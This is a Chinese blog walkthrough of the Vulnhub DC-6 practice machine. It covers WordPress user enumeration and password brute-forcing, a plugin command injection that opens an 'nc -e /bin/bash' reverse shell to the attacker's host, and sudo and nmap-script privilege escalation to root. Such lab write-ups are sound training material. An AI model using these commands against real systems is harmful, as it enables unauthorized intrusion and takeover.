DC-6靶机渗透测试详细教程

已于 2024-01-05 19:27:06 修改
阅读量1.2k 收藏 24
点赞数 23
文章标签: 数据库 web安全 网络安全 系统安全 计算机网络 安全 安全架构
于 2023-12-14 14:42:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jennycisp/article/details/134995019
版权

DC-6教程

描述
DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。

这不是一个过于困难的挑战,所以应该非常适合初学者。

此挑战的最终目标是获得 root 权限并读取唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。

DC-6下载:https://download.vulnhub.com/dc/DC-6.zip.torrent

攻击者kali:192.168.1.11

靶机:DC-6:192.168.1.10

通过arp-scan -l扫描到DC-6的IP地址,如果不确定的可以在虚拟机的网络设置查看DC-6的物理地址

使用namp 扫描DC-6

nmap -sS -A -p- 192.168.1.10

只有22和80端口

访问一下80端口

访问不上,但是有显示wordy

修改一下本地的hosts文件,修改成DC-6的IP地址

即可访问,打开后发现是wordPress的博客

使用wpscan来枚举看看有几个账号

wpscan --url http://wordy/ --enumerate u

枚举出来了五个账号分别是admin、graham、mark、sarah、jens

在桌面创建一个dc6user.txt的文本并写入

使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破(这是官网给的提示)

进入到/usr/share/wordlists下你会发现有一个rockyou.txt.gz

需要解压才能得到rockyou.txt

gzip -c -d roukyou.txt.gz > /root//roukyou.txt

因为这个字典非常大,解压出来也是需要等一会才解压完,建议等个几分钟,如果在桌面打开rockyou.txt文档往下滑,看右边的进度条还在往下的话说明还在解压导出中。

因为密码字典太大,将密码筛选出来

cat rockyou.txt | grep k01 > dc6passw.txt

wpscan --url http://wordy/ -U dc6user.txt -P dc6passw.txt

得到账号mark 密码helpdesk01

扫描一下网站的目录看看从哪里登录

nikto -h

使用nikto扫描出来无结构

使用dirb扫描出来管理员登录界面

dirb http://wordy/

打开登录界面输入账号密码登录

登入进去后发现他使用了插件

页面这里也有个工具点击一看

从内容解释中说可以解析IP地址啥的

尝试输入域名看看,就输入靶机的

能执行

试试IP也能执行

原本想试试能不能命令注入,发现有长度的限制

只能尝试用burp来抓包修改看看

我输入的IP

发送到测试器看看

在IP地址后面加上命令注入看看

点击发送数据包

没有过滤还得到了响应

管道符命令注入成功,存在漏洞

哪这时候就可以在后面执行反弹shell

kali端进行监听

nc -lvnp 4444

burp修改命令注入

192.168.1.9|nc -e /bin/bash 192.168.1.11 4444

发送数据包

连接成功,大家监听前一定要先查看一下自己的IP 地址

打开交互模式

python -c ‘import pty;pty.spawn(“/bin/bash”)’ 必背

尝试提权

进入home目录看看有没有账号可登录

看到有四个文件

最后在mark下的stuff看到有个文本

好像是graham的密码

尝试ssh登录看看

ssh graham@192.168.1.10

登录成功

提权

sudo -l

提示jens下的脚本

是一个解压脚本的命令

将脚本修改一下,将/bin/bash写入脚本

echo “/bin/bash” >> backups.sh

用jens来执行

sudo -u jens ./backups.sh

进入到了jens用户下

使用sudo -l查看一下

又是一个提示,nmap可以执行root

在当前目录下常见一个脚本执行文件

echo “os.execute(‘/bin/bash’)”>demon.nse

sudo nmap --script=/home/jens/demon.nse

进入到root

cat /root/ theflag.txt

进入到root后输入命令不会显示出来,得回车了才会显示

DC-6总结

hosts定向

wpscan枚举账号(因为是WordPress博客)

wpscan账号密码爆破

dirb目录扫描得到admin登录地址

发现命令注入漏洞

使用burp抓包修改数据反弹shell

打开交互模式 python -c ‘import pty;pty.spawn(“/bin/bash”)’

进入到home目录查看DC-6的用户目录

发现graham账号的密码,进行ssh登录成功

使用sudo -l查看权限

利用命令脚本转换到jens用户

发现可执行root的文件为nmap

创建一个nmap文件执行脚本

echo “os.execute(‘/bin/bash’)”>demon.nse

只想nmap文件执行脚本获取到root

sudo nmap --script=/home/jens/demon.nse

在root目录下拿到flag,转到root下之后执行完命令才会显示出来,打的时候不会显示命令

朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述

网络安全技术库
关注
  • 23
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC靶机系列:DC-6
Ays.Ie的博客
02-28 561
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 906
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
最新发布
rumil的博客
04-20 878
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
靶机7 DC-6(过程超详细
honest_gg的博客
09-26 2781
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-6靶机渗透详细流程
braty_的博客
01-28 473
wpscan --url http://wordy -U users.list -P /usr/share/wordlists/rockyou.txt //kali自带的字典。接着我们向里面追加写入一个shell的命令,发现现在的用户权限不够,待会再说。提权后是盲敲,光标没变化,,算了,编辑好在粘贴去找flag。发现访问不了,,记起来有重定向,要添加 hosts。哦吼,意外之喜,,发现了5个用户名。先看看 SUID:没啥有用的信息。文件,那我们直接先 su 过去。看回显,,果然存在。
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1901
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
CISP-PTE靶场(win+centos).zip
03-13
pte-win2003.rar pte-centos(新可用).rar CISP-PTE靶场搭建方法.rar
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 772
DC-6靶机详细渗透过程
Vulnhub靶机DC-6
m0_60911102的博客
11-30 914
Vulnhub靶机DC-6
Neos的渗透测试靶机练习——DC-6
qq_38678845的博客
01-11 934
一次渗透测试练习
看完这篇 教你玩转渗透测试靶机vulnhub——DC6
Aluxian_的博客
03-28 5281
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解:③:漏洞发现:④:漏洞利用:⑤:提权:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC6,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https
DC-6的靶机渗透
m0_74950307的博客
10-27 117
pty.spawn("/bin/bash")' 命令的用途是在某些情况下改进当前终端的功能和体验。将使用 Bash shell 来执行其中的命令,也就是该脚本进去了虚拟终端,我们可以使用虚拟终端来控制它。9.获得了password和user的密码集,那么就可以进行爆破,可以使用burp也可以使用wpscan。dc靶机的网站:http://wordy/以及登录界面:http://wordy/wp-admin/".sh" 是Shell脚本文件的常见文件扩展名,它指示该文件是使用Shell编程语言编写的脚本。
DC-6靶机测试渗透详细教程
wwxxss
10-26 1285
DC-6的靶场详细渗透过程
DC-022-20A
01-16
DC-022-20A是一种直流电源接口,可以支持最大电流为20A的电路。它通常用于连接电源和电路板,以提供稳定的电源供应。这种接口具有较高的电流承载能力,适用于一些需要大电流的应用场景。 以下是一个使用DC-022-20A接口的示例: ```python # 假设我们有一个需要20A电流供应的电路板 # 连接电源和电路板 power_supply = DC-022-20A circuit_board = CircuitBoard() power_supply.connect(circuit_board) # 提供稳定的电源供应 power_supply.set_current(20) # 设置电流为20A # 运行电路板 circuit_board.run() ``` 在这个示例中,我们使用DC-022-20A接口连接了一个电源和一个电路板。通过设置电源的电流为20A,我们为电路板提供了稳定的电源供应。然后,我们运行电路板以执行其功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全技术库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值